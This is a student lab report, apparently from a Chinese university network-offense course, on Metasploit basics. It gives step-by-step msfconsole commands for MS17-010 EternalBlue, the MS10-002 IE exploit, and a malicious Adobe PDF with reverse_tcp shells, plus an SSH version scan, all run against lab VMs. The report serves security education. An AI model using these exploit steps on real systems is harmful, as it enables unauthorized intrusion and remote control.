2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础

实验内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,完成ms17-010-eternalblue(成功); (1分)

1.2 一个针对浏览器的攻击,完成ms10_002(成功);(1分)

1.3 一个针对客户端的攻击,如Adobe(成功);(1分)

1.4 成功应用任何一个辅助模块:scanner/ssh/ssh_verision(成功且唯一)。(0.5分)

1.5 报告评分(1分)

基础问题回答

用自己的话解释什么是exploit,payload,encode.

  1. exploit:利用msf中选择的模块,payload以及攻击对象的信息对目标机的漏洞进行攻击的过程。
  2. payload:当我们选择利用某一个漏洞进行攻击时,需要选择一个payload,可以说是选择一种代码,或者说是对这个漏洞的攻击方式。
  3. encode:对payload进行编码,降低被查出的风险。

实践过程记录

1.一个主动攻击实践,完成ms17_010-eternalblue永恒之蓝攻击

  • 攻击机:kali IP:10.1.1.216
  • 靶机:windows XP系列:全都没有成功

  • 靶机:windows server 2008(中文) IP:10.1.1.166

    步骤如下

  • 先对靶机进行漏洞扫描nmap -script vnlu 10.1.1.166可以看到win server 2008系统没有ms08漏洞,但是有ms17_010漏洞

  • search ms17_010查找相关模块
  • 使用exploit/windows/smb/ms17_010_eternalblue
  • 输入use exploit/windows/smb/ms17_010_eternalblue
  • set payload windows/x64/meterpreter/reverse_tcp设置payload
  • set rhost 10.1.1.166填写靶机IP
  • set lhost 10.1.1.216填写攻击机IP

  • set lport 5205填写攻击机端口号

  • run开始攻击

  • 攻击成功可以看到session 1 opened

  • 输入shell可以得到命令行

  • 可以通过dir查看windows/system32下的文件

2.一个针对浏览器的攻击,完成ms10_002

  • 攻击机:kali IP:10.1.1.216
  • 靶机:windows XP SP3(中文) IP:10.1.1.235
  • 这个漏洞需要靶机访问攻击机的网站IE浏览器的版本需要是7及7以下
  • set lhost 10.1.1.216设置攻击机IP
  • set srvport 80

  • set lport 443设置端口

  • 然后exploit就可以等待了

  • 打开XP的IE浏览器,访问http://10.1.1.216:80

  • 这是攻击机可以看到会话已经建立了

  • sessions先看一下会话号

  • session -i 4这里的数字是会话号,需要提前查,只有在浏览器还开着的时候才能打开对话,要抓紧时间得到shell

  • shell之后,这次我用的是net start查看功能

3.一个针对客户端的攻击,如Adobe

  • 攻击机:kali IP:10.1.1.216
  • 靶机:windows XP SP3(中文) IP:10.1.1.235 adobereader9
  • use exploit/windows/fileformat/adobe_cooltype_sing使用这个模块
  • set payload windows/meterpreter/reverse_tcp使用这个payload
  • set lhost 10.1.1.216设置攻击IP

  • set FILENAME 20165205.pdf设置攻击文件的名称

  • exploit即可产生攻击文件
  • 将文件移动到XP里
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost 10.1.1.216
  • set lport 5205

  • exploit

  • 以上都是十分熟悉的步骤
  • 之后打开pdf文件,kali就攻击成功了

  • 得到shell后就可以操作一番了

4.成功应用任何一个辅助模块:scanner/ssh/ssh_verision

  • use auxiliary/scanner/ssh/ssh_version辅助模块的scanner下的功能基本都是扫描功能的,这个模块的功能是扫描ssh的版本
  • set rhosts 10.1.1.0/24扫描10.1.1网段的所有子网
  • run或者exploit之后需要等待
  • 最后扫描到的是kali的ssh版本号hhhhh

实验中遇到的问题

  1. 问题:做ms08攻击时,遇到no session的问题
    解决方法:可能是操作系统版本的问题,我在之后换靶机的时候回先用nmap扫描一下版本漏洞在攻击。
  2. 在auxiliary的辅助模块中很多都读不懂,选择了比较简单的scanner模块,但是其他模块还是有很多的,希望以后可以用到

实践总结与体会

  1. 实践中遇到很多次攻击后发现攻击没有成果,去找原因的时候发现是系统打过补丁或者是软件版本较高漏洞被修补,所以以后再做时要先扫描漏洞,而不是盲目地直接攻击。
  2. 每一个攻击模块都可以查看options,写yes都是需要填写的

离实战还缺什么技术和步骤

我们现在的操作都要求漏洞是没有被打过补丁或者没有更新过的,但是现实我们现在用的软件,系统都是没有这些很明显的漏洞的,我们的利用的漏洞都是被人发现过的,也就是说是被破解的,我们现实中想要攻击还需要自己去发现漏洞才行。

2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础的更多相关文章

  1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  2. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  3. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  4. 2018-2019 20165220 网络对抗 Exp5 MSF基础

    实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

  5. 2018-2019 20165219 网络对抗 Exp5 MSF基础

    实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

  6. 20145338 《网络对抗》 MSF基础应用

    20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...

  7. 20145308 《网络对抗》 MSF基础应用 学习总结

    20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

  8. 20145326蔡馨熤《网络对抗》——MSF基础应用

    20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...

  9. 20155218《网络对抗》MSF基础应用

    20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...

  10. 20155304《网络对抗》MSF基础应用

    20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...

随机推荐

  1. 2.7 while 、for 循环控制语句

    一.while语句: 在程序中,需要重复性的做某件事: 1.1.1 while: public class Test{ public static void main(String[] args){ ...

  2. JS处理日期&字符串格式相互转换

    之前找过一些获取系统日期以及日期&字符串格式相互转换的方式,但总体自我感觉来说还是以下的方式会更适合一些. 如有更好的方式,望大家多多赐教和交流,谢谢! 2016年曾写过一次,不过只是发了一下 ...

  3. 学习笔记CB003:分块、标记、关系抽取、文法特征结构

    分块,根据句子的词和词性,按照规则组织合分块,分块代表实体.常见实体,组织.人员.地点.日期.时间.名词短语分块(NP-chunking),通过词性标记.规则识别,通过机器学习方法识别.介词短语(PP ...

  4. 4. Traffic monitoring tools (流量监控工具 10个)

    4. Traffic monitoring tools (流量监控工具 10个)EttercapNtop SolarWinds已经创建并销售了针对系统管理员的数十种专用工具. 安全相关工具包括许多网络 ...

  5. 试写foxit reader的ConvertToPDF功能的wrapper

    相比于直接fuzzing大型程序本身,针对程序的某一特定功能写wrapper后再fuzzing则要高效的多.网上搜了下,仅有两篇关于foxit reader的wrapper文章,一个用python,另 ...

  6. Java(日期、随机数、系统工具类)

    Date类 一般用于获取时间 Date date1 = new Date();//获取当前系统时间 Date date2 = new Date(10000);//获取从标准基准时间起10000毫秒的时 ...

  7. Linux df -h空间显示不正确

    今天发现一个测试数据库磁盘空间快满了,准备将几个不再用的表空间删除.通过以下命令删除表空间内容及数据文件. drop tablespace tablespace_name including cont ...

  8. [noip2016]洛谷2827

    来一发文字证明~ 数据范围很大... 如果用priority_queue搞的话肯定是会t的. 所以肯定要想一想优化的思路. 我们发现,对于队列来讲,同加,减是不改变这个队列的大小关系的: 但是呢,切开 ...

  9. github-上传自己的项目到github仓库

    参考链接: https://blog.csdn.net/m0_37725003/article/details/80904824 https://www.cnblogs.com/cxk1995/p/5 ...

  10. SourceInsight宏插件3(非常好用,强力推荐)

    openfolder.em源码:(链接:https://pan.baidu.com/s/1draaimWzCHZ3vLxL--lfiQ  提取码:zyq4) //使用资源管理器打开当前文件所在文件夹, ...